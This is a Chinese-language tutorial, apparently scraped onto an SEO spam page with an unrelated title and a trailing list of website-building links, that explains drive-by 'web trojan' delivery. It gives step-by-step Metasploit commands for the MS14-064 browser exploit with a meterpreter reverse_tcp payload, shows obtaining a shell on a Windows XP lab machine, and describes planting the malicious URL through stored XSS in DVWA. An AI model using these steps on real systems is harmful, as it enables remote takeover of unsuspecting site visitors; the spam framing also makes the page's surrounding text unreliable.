当前位置: 首页 > news >正文

常德网站建设wynet123福州公司建设网站

常德网站建设wynet123,福州公司建设网站,wordpress登录窗口,wordpress算数的插件**今天讲下通过XSS实现网页挂马~*#xff0c;目的是了解安全方面知识#xff0c;提升生活网络中辨别度 原理#xff1a; 实验分为两部分#xff1a; 1、通过Kali linux#xff0c;利用MS14_064漏洞#xff0c;制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木…**今天讲下通过XSS实现网页挂马~*目的是了解安全方面知识提升生活网络中辨别度 原理 实验分为两部分 1、通过Kali linux利用MS14_064漏洞制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木马服务器会造成缓冲区溢出攻击者可以直接获取用户的系统Shell。 2、将木马服务器的URL插入到一个存在存储型XSS漏洞的正常web服务器中一旦有人访问该服务器的挂马页面而且该用户存在MS14_064漏洞就会中招。 制作木马服务器 1.概念说明 1MS14_064漏洞 MS代表MicroSoft14_064指的是2014年的第64个漏洞。 该漏洞影响范围为Win95IE3 – Win10IE11全版本造成被攻击主机缓冲区溢出触发该漏洞需要客户端安装有power shell软件。 2MetaSploit FrameworkMFS 本次进行缓冲区溢出的工具主要是MetaSploit Framework其中集成了各个平台上常见的溢出漏洞和利用代码并且不断更新。 Kali linux 自带该工具可直接使用。 MFS包含三个基本模块 渗透攻击模块exploit用于实际发起渗透攻击 辅助模块auxiliary执行扫描之类的动作 攻击载荷模块payload目标系统被成功渗透后执行的代码payload中的主要内容包括shellcode一段获取shell的代码。 一般都是先使用渗透攻击模块exploit对目标系统进行渗透渗透成功后执行攻击载荷模块payload。 2. MFS初始操作 启动msfrootkali:~# msfconsole 初始化数据库msf5 msfdb init //数据库初始化后msf查询速度会大幅提升 msf5 db_status #查看MSF数据库连接状态 。 3.使用MS14_064漏洞 首先我们搜索一下MS14_064漏洞 msf5 search MS14_064 调用这个exploitmsf5use exploit/windows/browser/ms14_064_ole_code_execution 查看一下这个exploit需要配置的选项 msf5 exploit(ms14_064_ole_code_execution) show options 设置允许调用powershell msf5 exploit(ms14_064_ole_code_execution) set AllowPowershellPrompt true //该漏洞需要利用目标主机powershell功能 设置木马服务器IPKali IP msf5 exploit(ms14_064_ole_code_execution) set srvhost 192.168.211.134 设置调用的payload msf5 exploit(ms14_064_ole_code_execution) set payload windows/meterpreter/reverse_tcp 这里使用反弹连接payload让靶机主动连接我们。使用reverse类型的好处在于可以不用担心连接被靶机的防火墙阻断。 设置监听IPkali IP msf5 exploit(ms14_064_ole_code_execution) set lhost 192.168.211.134 再设置一下监听接口靶机中招后会主动连接我们这个端口 msf5 exploit(ms14_064_ole_code_execution) set lport 4444 最后输入exploit或者run开启攻击服务 kali 的web服务已开启并生成了一个URLhttp://192.168.211.134:8080/Dyvk2r6MwyGc一旦存在MS14_064漏洞的主机访问这个URL就会被控制。 4.尝试控制靶机 我们使用一台Windows xp主机192.168.211.171通过浏览器访问http://192.168.211.134:8080/Dyvk2r6MwyGc 访问后Kali 立刻提示已发送exploit至目标主机并且打开了一个连接 通过session -l 我们可以查看当前有会话的主机id号为1 使用 session -i id号我们就可以连上靶机 输入shell成功取得靶机的shell 下一步我们就想办法通过XSS将这个URL挂到一个web服务器上去就不用我们亲自去传播这个木马了~ 利用XSS网页挂马 接下来我们就开始网页挂马吧~ 首先我们的目标是一个存在存储型XSS漏洞的网页看过我前面文章的小伙伴们应该知道DVWA平台上就有专门给我们练习存储型XSS漏洞的页面我们就通过这个网页来实践挂马。 将网页安全等级调整为low插入如下js语句 但是会发现网页有输入长度限制 前端输入长度限制利用火狐浏览器查看源代码修改长度限制即可 输入后顺利插入恶意js语句 此时查看网页源代码就能看到js脚本了 最后靶机通过浏览器访问这个挂马网页 查看Kali成功连接 入侵成功~ payload 除了使用script标签以外还有其他多种标签如 就这样吧
http://www.dnsts.com.cn/news/224665.html

相关文章:

  • seo推广软件费用seo网站分析工具
  • 找装修公司上什么网站平面设计培训网站大全
  • 外贸网站建设推广公司哪里有免费建设网站
  • 网站如何做双语言如何建设网站知乎
  • 电商模板网站大宗商品电子交易平台
  • 炫酷的动画网站中国纪检监察报订阅
  • 国家住房部和城乡建设部 网站首页大庆建设公司网站
  • 双语网站系统手机网站和app的区别
  • 成都网站优化多少钱咸阳商城网站开发设计
  • 普陀微信网站建设wordpress 文章 格式
  • 大庆+网站建设东莞网站系统找哪里
  • 临漳+网站建设重庆网站建设电话
  • 阿里巴巴网站建设与维护虚拟空间软件下载
  • 企业内部的网站系统什么是网络设计图
  • 怀化网站优化加徽信xiala5效果好网站建设程序员
  • 如何查看网站空间如何建设游戏网站
  • 提供网站建设工具的品牌有哪些杭州seo关键词优化哪家好
  • 自发购卡网站在吗做网站改版的影响
  • 网站流量查询 优帮云html 网站模板
  • 专业做网站关键词排名下掉wordpress大型站点
  • 岳阳公司网站建设sae wordpress 伪静态
  • 便捷网站建设推荐上海到北京顺丰快递要多久
  • 常州网站建设制作中国建设银行报名网站
  • 成都微信网站建设公司哪家好wordpress 所有文章列表
  • 网站如何2021年10月新闻摘抄
  • 龙岗建网站智慧团建官方网站登录
  • 网站编辑难做吗传奇手游网站大全
  • 美容加盟网站建设php购物网站开发实例源码
  • 上海企业网站建设电话开发小程序外包公司
  • 网站建设应走什么会计科目游戏推广招聘